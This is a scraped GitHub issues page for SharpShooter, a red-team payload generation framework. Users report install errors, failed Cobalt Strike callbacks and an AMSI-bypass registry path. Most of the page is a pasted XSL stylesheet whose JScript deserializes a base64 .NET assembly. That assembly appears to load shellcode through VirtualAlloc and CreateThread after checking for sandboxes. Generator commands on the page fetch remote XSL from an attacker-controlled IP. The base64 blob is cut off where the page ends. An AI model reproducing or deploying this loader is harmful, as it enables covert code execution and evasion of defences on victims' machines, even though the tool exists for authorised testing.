mdsecactivebreach / sharpshooter Goto Github PK
View Code? Open in Web Editor NEWPayload Generation Framework
License: BSD 3-Clause "New" or "Revised" License
Payload Generation Framework
License: BSD 3-Clause "New" or "Revised" License
when i installed it it said ImportError: No module named jsmin
how can i fix this
Hi there,
In the blog posts its is shown that the reverse_http C# shell code is used. However after a couple hours of trying to use the tool for the first time thinking i was doing something wrong, I decided to switch to reverse_tcp and it worked the first try
Using the newest version of Kali and windows 7 SP1 .net 2-4 (Fireeye Flare packages installed)
Hi, I came across this yesterday and thought it was a really cool project so today I'm having a little play!
I have generated a C# payload from Cobalt Strike, and put it in the format "0x41, 0x42" etc, and then reference that in my command:
python SharpShooter.py --dotnetver 2 --stageless --payload hta --rawscfile ~/payload.cs --smuggle --output payload --template mcafee
I host the html and hta on the web server using "host file" in Cobalt strike. When I go and visit the page the HTA Downloads and I can execute it, but I don't get a callback.
Iv had a skim of the source code but its not immediately obvious to me why this wouldn't work. I have .NET installed on the machine im testing on also.
I suppose im asking does this definitely work with Cobalt Strike C# payloads?
Thanks again for the project and look forward to your response.
Cheers
EDIT 14:33:
I have been testing again and I put the same shellcode into the CS file and compiled and executed it worked fine. Its not an EDR product blocking either so I am still unsure. just doesnt seem to work when using the generated HTA file
when i start SharpShooter after installing requirements.txt i do python SharpShooter.py but it doesn't start i also tried to do chmod + x or 777 on SharpShooter.py but it always gives me this error: Traceback (most latest call last):
File "SharpShooter.py", line 20, in
from jsmin import jsmin
ImportError: no module called jsmin
chmod 755 SharpShooter.py
I've done a recent git clone and it appears to not be accepting anything other than the staged HTA payload and even still it does not appear to connect back to the attacking machine. the demo one liners result in a looping error in its selection.
Am I missing something or is the tool just not ready to be used.
i successfully installed JSMIN, running python SharpShooter.py not locating jsmin and it exist on system. kindly advice
how can i use custom payload. hta, vbs, js etc?
Detect process into memory and freeze it. Some days ago it didnt detected...
I was looking at your recent commit adding the AMSI bypass for VB and JS methods, and looked for the reg path HKCU\Software\Microsoft\Windows Script\Settings\
on my 1803 Windows machine, and couldn't find it. There is a HKCU\Software\Microsoft\Windows Script Host\Settings\
key however.
Just wanted to make sure that the path wasn't in error.
Hi,
I'm getting a similar problem to mdsecactivebreach/CACTUSTORCH#4. Basically I am generating a payload using the following arguments:
python SharpShooter.py --stageless --dotnetver 4 --payload macro --output foo --amsi amsienable --rawscfile payload.bin --com xslremote --awlurl http://172.16.132.1:80/foo.xsl
The macro is then being run on a Win 10 host with only .net framework v4 installed (no .net v2). However, with both my own assembly and the built-in sharpshooter assembly, the code executes but I get no callbacks. After putting in some debug shell.popups, it looks like it's failing when it gets to some of the System calls. Is there some sort of issue with running the JScript from XSL on systems with on .net v4 installed? The Jscript runs fine on the same system when executed from a SCT file etc.
Code below:
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:sharp="http://sharp.shooter/mynamespace">
<msxsl:script language="JScript" implements-prefix="sharp">
function shooter(nodelist) {
<![CDATA[
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAACoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAC2SEWgAAAAAA"+
"AAAA4AAiIAsBMAAAIAAAAAgAAAAAAACKPwAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAOD8A"+
"AE8AAAAAQAAAVAQAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAA+AAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAACQHwAAACAAAAAgAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAVAQAAABA"+
"AAAABgAAACIAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAoAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAGw/AAAAAAAASAAAAAIABQDMIwAANBoAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXgMoEAAACm8R"+
"AAAKFygSAAAKLAIXKhYqbnIBAABwKBAAAApvEQAAChcoEgAACiwCFioXKhMwBABSAQAAAQAAEXMT"+
"AAAKCh8gjRoAAAElFnIDAABwoiUXclUAAHCiJRhypQAAcKIlGXLzAABwoiUackUBAHCiJRtylQEA"+
"cKIlHHLhAQBwoiUdcjkCAHCiJR5yjQIAcKIlHwly3QIAcKIlHwpyNwMAcKIlHwtyhwMAcKIlHwxy"+
"3wMAcKIlHw1yNwQAcKIlHw5ylwQAcKIlHw9y5wQAcKIlHxByPQUAcKIlHxFykwUAcKIlHxJy4wUA"+
"cKIlHxNyOQYAcKIlHxRyfQYAcKIlHxVywQYAcKIlHxZyBwcAcKIlHxdySQcAcKIlHxhymwcAcKIl"+
"Hxly6QcAcKIlHxpyOwgAcKIlHxtykwgAcKIlHxxy4wgAcKIlHx1yQQkAcKIlHx5yiwkAcKIlHx9y"+
"zwkAcKILFgwrFwcImg0JKBQAAAosBwYJbxUAAAoIF1gMCAeOaTLjBm8WAAAKLQIWKhcqAAATMAYA"+
"xwAAAAIAABFzEwAACgobjRoAAAElFnIZCgBwoiUXcicKAHCiJRhyNQoAcKIlGXJDCgBwoiUaclEK"+
"AHCiCygXAAAKDBYNK3YICZoTBAcTBRYTBitdEQURBpoTBxEEbxgAAApvGQAACm8aAAAKEQdvGgAA"+
"Cm8bAAAKLDEGEQRvGAAACm8ZAAAKcl8KAHByaQoAcCgcAAAKF40fAAABJRYfOp1vHQAACm8VAAAK"+
"EQYXWBMGEQYRBY5pMpsJF1gNCQiOaTKEBm8WAAAKLQIWKhcqLigeAAAKLAIXKhYqHgIoHwAACioA"+
"EzACAG0AAAADAAARcwYAAAYKA0UFAAAAAQAAABEAAAAgAAAALwAAAD4AAAAqBgRvAQAABi1CFygg"+
"AAAKKgZvAgAABi0zFyggAAAKKgZvAwAABiwkFyggAAAKKgZvBAAABiwVFyggAAAKKgZvBQAABiwG"+
"FyggAAAKKjJzCgAABgNvDQAABioAABswBABbAAAABAAAEQMoIQAACgp+IgAACgaOaRdYaigjAAAK"+
"IAAwAAAfQCgHAAAGCwYWBwaOaSgkAAAKB9AHAAACKCUAAAooJgAACnQHAAACbw8AAAYm3g4HFiAA"+
"gAAAKAkAAAYm3CoAARAAAAIAJAAoTAAOAAAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAA"+
"AAUAbAAAAPAFAAAjfgAAXAYAAOwGAAAjU3RyaW5ncwAAAABIDQAAdAoAACNVUwC8FwAAEAAAACNH"+
"VUlEAAAAzBcAAGgCAAAjQmxvYgAAAAAAAAACAAABVx0CHAkCAAAA+gEzABYAAAEAAAAoAAAABwAA"+
"ABcAAAARAAAAFwAAACYAAAAUAAAAEQAAAAQAAAACAAAAAQAAAAMAAAABAAAAAgAAAAQAAAAAAEEE"+
"AQAAAAAABgARA4cFBgB+A4cFBgAtAj0FDwCnBQAABgBVApQEBgDDApQEBgCkApQEBgBlA5QEBgAx"+
"A5QEBgBKA5QEBgBsApQEBgBBAmgFBgAfAmgFBgCHApQEBgBqBloEBgABAOYACgBiAXYEBgACA1oE"+
"BgBhBFoEBgC3BGgFBgDgAmgFBgANAloEBgCTBloEBgAPBFoECgC5BXYEBgAEBFoEBgDJBFoEBgDB"+
"AX8ACgAhBnYECgDLBv8FBgDiBFoEBgDnBD0FBgCnBloEBgDDBloEBgA2BVoEBgA1BVoEBgAsBGgF"+
"BgDsAVoEBgCdAVoEBgAWAloEAAAAAB0AAAAAAAEAAQAAABAA8QEAAD0AAQABAAEAEAAaBQAAPQAB"+
"AAcAAgEAAOIBAABNAAEADgACAQAApgQAAE0ACQAOAAIBAADXAQAATQAVAA4AAgEAAP0BAABZABgA"+
"DgAGBswALgFWgKoAMQFWgFkAMQFWgJ4AMQFWgIkAMQFWgG0AMQFWgHYAMQFWgGEAMQEGBswALgFW"+
"gFEANQFWgCYANQFWgD8ANQFWgLoANQFWgJUANQFWgLEANQFWgEcANQFWgMIANQFWgK8DNQFWgMID"+
"NQFWgNcDNQEGBswALgFWgKQAOQFWgDMAOQFQIAAAAACGAGYEcQABAGggAAAAAIYARAE9AQIAhCAA"+
"AAAAhgBKBj0BAgDkIQAAAACGAN0APQECALciAAAAAIYAKgE9AQIAwyIAAAAAhhgvBQYAAgAAAAAA"+
"gACRIAEBQQECAAAAAACAAJYgGQFLAQYAAAAAAIAAkSB7AVUBDADDIgAAAACGGC8FBgAPAMwiAAAA"+
"AIYA8QFdAQ8ARSMAAAAAhgDaBBAAEQBUIwAAAACGAL0GEAASAAAAAAADAIYYLwVjARMAAAAAAAMA"+
"xgGWAU4AFQAAAAAAAwDGAZEBaQEVAAAAAAADAMYBhwFxARcAAAABAG8EAAABADEGAAACAKgDAAAD"+
"AOABAAAEAHgGAAABAMwFAAACAJwDAAADADsGAAAEAPAEAAAFAN8FAAAGAA4BAAABADEGAAACAKgD"+
"AAADANUBAAABACYEAAACAAsEAAABABEAAAABABEAAAABAHEGAAACAFsBAAABAB0EAAACAHEGAAAB"+
"AKAGCQAvBQEAEQAvBQYAGQAvBQoAKQAvBRAAMQAvBRAAOQAvBRAAQQAvBRAASQAvBRAAUQAvBRAA"+
"WQAvBRAAYQAvBRUAaQAvBRAAcQAvBRAAkQAvBQYAqQAvBRoAyQC2BSAAyQDGASUA0QDvBSkADAAv"+
"BQYA4QBjBkMADAAmAUgADACzBk4AiQBQBWYAiQAeBmwAeQACBCUA0QAnBSUA0QD2BXEA8QBzAXYA"+
"0QBTAX0AAQE1AYMAeQAvBQYACQGOBowAEQHxA5cAGQHdBJ0AIQGCBqAAKQHmBqUAMQGvAa4AKQH8"+
"BLcACQAIAMoACQAMAM8ACQAQANQACQAUANkACQAYAN4ACQAcAOMACQAgAOgACQAoAO0ACQAsAPIA"+
"CQAwAPcACQA0APwACQA4AAEBCQA8AAYBCQBAAAsBCQBEABABCQBIABUBCQBMABoBCQBQAB8BCQBY"+
"ACQBCQBcACkBLgALAHcBLgATAIABLgAbAJ8BLgAjAKgBLgArAMIBLgAzAOUBLgA7AOsBLgBDAKgB"+
"LgBLAAMCLgBTAOUBLgBbAOUBLgBjACsCLgBrAFUCYwBbAGICgwBzAAEBowBzAAEB4wB7AJ8BMQBS"+
"AIcAkQA0BAgAPQBAAQ8AAQEBAAABEQAZAQEAAAETAHsBAgAEgAAAAQAAAAAAAAAAAAAAAADRBgAA"+
"AgAAAAAAAAAAAAAAwQDUAAAAAAACAAAAAAAAAAAAAADBAFoEAAAAAAQAAwAFAAMABgADAAcAAwAA"+
"AAAAAExpc3RgMQBrZXJuZWwzMgBzaGVsbGNvZGU2NAA8TW9kdWxlPgBFWEVDVVRFX1JFQUQATUVN"+
"X1JFTEVBU0UARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAFdSSVRFX1dBVENIAFBI"+
"WVNJQ0FMAFRPUF9ET1dOAFN5c3RlbS5JTwBMQVJHRV9QQUdFUwBOT0FDQ0VTUwBSRVNFVABNRU1f"+
"REVDT01NSVQAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBpc0Jh"+
"ZE1hYwBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBWaXJ0dWFsQWxsb2MAbHBUaHJlYWRJZABD"+
"cmVhdGVUaHJlYWQAQWRkAGlzRGVidWdnZWQAZ2V0X0lzQXR0YWNoZWQAaXNEb21haW5Kb2luZWQA"+
"VHJpbUVuZABtZXRob2QATmV0d29ya0ludGVyZmFjZQBSZXBsYWNlAFZpcnR1YWxGcmVlAEVuZElu"+
"dm9rZQBCZWdpbkludm9rZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBGaWxl"+
"AGdldF9Eb21haW5OYW1lAGR3RnJlZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBDaGVja1BsZWFzZQBF"+
"eGVjdXRlRGVsZWdhdGUATXVsdGljYXN0RGVsZWdhdGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxl"+
"QXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3Nl"+
"bWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2Vt"+
"Ymx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAFVu"+
"bWFuYWdlZEZ1bmN0aW9uUG9pbnRlckF0dHJpYnV0ZQBGbGFnc0F0dHJpYnV0ZQBDb21waWxhdGlv"+
"blJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNv"+
"cHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGli"+
"aWxpdHlBdHRyaWJ1dGUAZHdTdGFja1NpemUAZHdTaXplAEdVQVJEX01vZGlmaWVyZmxhZwBOT0NB"+
"Q0hFX01vZGlmaWVyZmxhZwBXUklURUNPTUJJTkVfTW9kaWZpZXJmbGFnAEZyb21CYXNlNjRTdHJp"+
"bmcAVG9TdHJpbmcAYXJnAEFzeW5jQ2FsbGJhY2sAY2FsbGJhY2sAY2hlY2sATWFyc2hhbABrZXJu"+
"ZWwzMi5kbGwAU2hhcnBTaG9vdGVyQXNzZW1ibHkuZGxsAFN5c3RlbQBFbnVtAGlzRG9tYWluAGRv"+
"bWFpbgBTeXN0ZW0uTmV0Lk5ldHdvcmtJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNZW1v"+
"cnlQcm90ZWN0aW9uAENhbGxpbmdDb252ZW50aW9uAFN0cmluZ0NvbXBhcmlzb24AR28AWmVybwBD"+
"aGFyAERlYnVnZ2VyAGxwUGFyYW1ldGVyAEdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyAFNo"+
"YXJwU2hvb3RlcgBUb0xvd2VyAC5jdG9yAFVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAEdldEFs"+
"bE5ldHdvcmtJbnRlcmZhY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0u"+
"UnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEdldElQR2xvYmFsUHJvcGVy"+
"dGllcwBscFRocmVhZEF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAEVxdWFscwBDb250YWlucwBT"+
"eXN0ZW0uVGV4dC5SZWd1bGFyRXhwcmVzc2lvbnMAR2V0UGh5c2ljYWxBZGRyZXNzAGxwQWRkcmVz"+
"cwBscFN0YXJ0QWRkcmVzcwBjb250YWluc1NhbmRib3hBcnRpZmFjdHMARXhpc3RzAE9iamVjdABv"+
"YmplY3QAZmxQcm90ZWN0AG9wX0V4cGxpY2l0AEV4aXQASUFzeW5jUmVzdWx0AHJlc3VsdABFbnZp"+
"cm9ubWVudABnZXRfQ291bnQAU2hvb3QAQ29udmVydABSZWdleABTaGFycFNob290ZXJBc3NlbWJs"+
"eQBDb3B5AAAAAQBRQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARABy"+
"AGkAdgBlAHIAcwBcAFYAbQBtAG8AdQBzAGUALgBzAHkAcwAAT0MAOgBcAHcAaQBuAGQAbwB3AHMA"+
"XABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AMwBkAGcAbAAuAGQAbABs"+
"AABNQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIA"+
"cwBcAHYAbQBkAHUAbQAuAGQAbABsAABRQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0"+
"AGkAdgBlAFwARAByAGkAdgBlAHIAcwBcAHYAbQAzAGQAdgBlAHIALgBkAGwAbAAAT0MAOgBcAHcA"+
"aQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AdABy"+
"AGEAeQAuAGQAbABsAABLQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwA"+
"RAByAGkAdgBlAHIAcwBcAHYAbQBjAGkALgBzAHkAcwAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AdQBzAGIAbQBvAHUAcwBlAC4A"+
"cwB5AHMAAFNDADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2"+
"AGUAcgBzAFwAdgBtAHgAXwBzAHYAZwBhAC4AcwB5AHMAAE9DADoAXAB3AGkAbgBkAG8AdwBzAFwA"+
"UwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUAcgBzAFwAdgBtAHgAbgBlAHQALgBzAHkAcwAA"+
"WUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMA"+
"XABWAE0AVABvAG8AbABzAEgAbwBvAGsALgBkAGwAbAAAT0MAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AaABnAGYAcwAuAGQAbABsAABX"+
"QwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIAcwBc"+
"AHYAbQBtAG8AdQBzAGUAdgBlAHIALgBkAGwAbAAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkA"+
"cwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0ARwB1AGUAcwB0AEwAaQBiAC4AZABs"+
"AGwAAF9DADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUA"+
"cgBzAFwAVgBtAEcAdQBlAHMAdABMAGkAYgBKAGEAdgBhAC4AZABsAGwAAE9DADoAXAB3AGkAbgBk"+
"AG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUAcgBzAFwAdgBtAHMAYwBzAGkA"+
"LgBzAHkAcwAAVUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBp"+
"AHYAZQByAHMAXABWAEIAbwB4AE0AbwB1AHMAZQAuAHMAeQBzAABVQwA6AFwAdwBpAG4AZABvAHcA"+
"cwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIAcwBcAFYAQgBvAHgARwB1AGUAcwB0"+
"AC4AcwB5AHMAAE9DADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIA"+
"aQB2AGUAcgBzAFwAVgBCAG8AeABTAEYALgBzAHkAcwAAVUMAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXABWAEIAbwB4AFYAaQBkAGUAbwAuAHMA"+
"eQBzAABDQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAdgBiAG8AeABk"+
"AGkAcwBwAC4AZABsAGwAAENDADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUA"+
"XAB2AGIAbwB4AGgAbwBvAGsALgBkAGwAbAAARUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBu"+
"AGEAdABpAHYAZQBcAHYAYgBvAHgAbQByAHgAbgBwAC4AZABsAGwAAEFDADoAXAB3AGkAbgBkAG8A"+
"dwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAC4AZABsAGwAAFFDADoAXAB3"+
"AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAGEAcgByAGEA"+
"eQBzAHAAdQAuAGQAbABsAABNQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBl"+
"AFwAdgBiAG8AeABvAGcAbABjAHIAdQB0AGkAbAAuAGQAbABsAABRQwA6AFwAdwBpAG4AZABvAHcA"+
"cwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAdgBiAG8AeABvAGcAbABlAHIAcgBvAHIAcwBwAHUALgBk"+
"AGwAbAAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgA"+
"bwBnAGwAZgBlAGUAZABiAGEAYwBrAHMAcAB1AC4AZABsAGwAAE9DADoAXAB3AGkAbgBkAG8AdwBz"+
"AFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAHAAYQBjAGsAcwBwAHUALgBkAGwA"+
"bAAAXUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgAbwBn"+
"AGwAcABhAHMAcwB0AGgAcgBvAHUAZwBoAHMAcAB1AC4AZABsAGwAAElDADoAXAB3AGkAbgBkAG8A"+
"dwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AHMAZQByAHYAaQBjAGUALgBlAHgAZQAA"+
"Q0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgAdAByAGEA"+
"eQAuAGUAeABlAABJQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAVgBC"+
"AG8AeABDAG8AbgB0AHIAbwBsAC4AZQB4AGUAAA0wADAAMABDADIAOQAADTAAMAAxAEMAMQA0AAAN"+
"MAAwADUAMAA1ADYAAA0wADAAMAA1ADYAOQAADTAAOAAwADAAMgA3AAAJLgB7ADIAfQAAByQAMAA6"+
"AAAAAADjPT+Kbg2uQYSXn8N3asUDAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIFIAEBEVEEAAAS"+
"ZQMgAA4HAAMCDg4RbQsHBBUSQQEOHQ4IDgUVEkEBDgQAAQIOBSABARMAAyAACBMHCBUSQQEOHQ4d"+
"EkUIEkUdDggOBQAAHRJFBCAAEnUEIAECDgYAAw4ODg4FIAEOHQMDAAACBAcBEggEAAEBCAUHAh0F"+
"GAUAAR0FDgIGGAQAARkLCAAEAR0FCBgICAABEoCZEYCdCQACEoChGBKAmQi3elxWGTTgiQQAEAAA"+
"BAAgAAAEAAAIAAQAAAAgBAAAQAAEAAAQAAQAACAABBAAAAAEIAAAAARAAAAABIAAAAAEAQAAAAQC"+
"AAAABAQAAAAECAAAAAQAAQAABAACAAAEAAQAAAQAQAAABACAAAACBgkDBhEQAwYRFAMGERgDIAAC"+
"CQAEGBgZERARFAkABhgYCRgYCRgHAAMCGAkRGAUgAgEIDgUgAgEcGAcgAhJdEmEcBSABCBJdCAEA"+
"CAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABkBABRTaGFycFNo"+
"b290ZXJBc3NlbWJseQAAIgEAHVNoYXJwU2hvb3RlciBQYXlsb2FkIERlbGl2ZXJ5AAAFAQAAAAAX"+
"AQASTURTZWMgQWN0aXZlQnJlYWNoAAAnAQAiQ29weXJpZ2h0IMKpIE1EU2VjIENvbnN1bHRpbmcg"+
"MjAxNwAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFmMzM3YWJlNTc3NwAADAEABzEuMC4w"+
"LjAAAAUBAAEAAAAAAAALZIRaAAAAAAIAAAAcAQAAHD4AABwgAABSU0RTCkrXhhukXku87fvh281l"+
"6QEAAABaOlxkbWNcQ29kZVxTaGFycFNob290ZXJcU2hhcnBTaG9vdGVyXENTaGFycFNob290ZXJT"+
"dGFnZWxlc3Ncb2JqXFJlbGVhc2VcU2hhcnBTaG9vdGVyQXNzZW1ibHkucGRiAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGA/AAAAAAAAAAAAAHo/AAAAIAAA"+
